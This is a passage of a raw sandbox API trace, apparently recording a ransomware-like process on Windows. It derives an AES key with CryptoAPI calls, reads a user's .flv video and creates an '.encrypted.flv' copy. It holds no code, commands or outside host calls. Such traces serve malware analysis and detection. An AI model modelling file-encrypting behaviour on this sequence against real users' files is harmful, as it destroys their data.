hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.142] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0043.142] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.142] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.142] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.142] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.142] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.142] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.142] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.142] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.142] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.142] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.142] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.142] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.142] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0043.142] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.142] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.142] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.142] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.142] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.142] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.143] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.143] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.143] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.143] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.143] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.143] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.143] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.143] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.143] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.143] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.143] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.143] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.143] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.143] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0043.143] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.143] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.143] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.143] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.143] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0043.143] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.144] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.144] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.144] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.144] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0043.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.144] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.144] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.144] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.144] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.144] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.144] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0043.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.144] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.144] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.145] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0043.145] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.145] CryptDestroyHash (hHash=0x7c2240) returned 1 [0043.145] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.145] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.145] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.145] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.145] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\iebg h7.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.145] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.145] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0043.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0043.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0043.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.146] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0043.146] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0043.146] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0043.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0043.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0043.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0043.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0043.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0043.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0043.147] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b")) returned 0x10 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0043.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0043.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0043.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.148] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.encrypted.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\iebg h7.encrypted.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0043.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0043.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0043.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0043.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.148] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0043.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0043.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0043.149] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0043.149] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0043.149] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0043.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0043.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0043.149] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0043.150] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0043.152] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x4e60, lpOverlapped=0x0) returned 1 [0043.153] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0043.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14e60) returned 0xac2018 [0043.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0043.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.154] HeapFree (in: 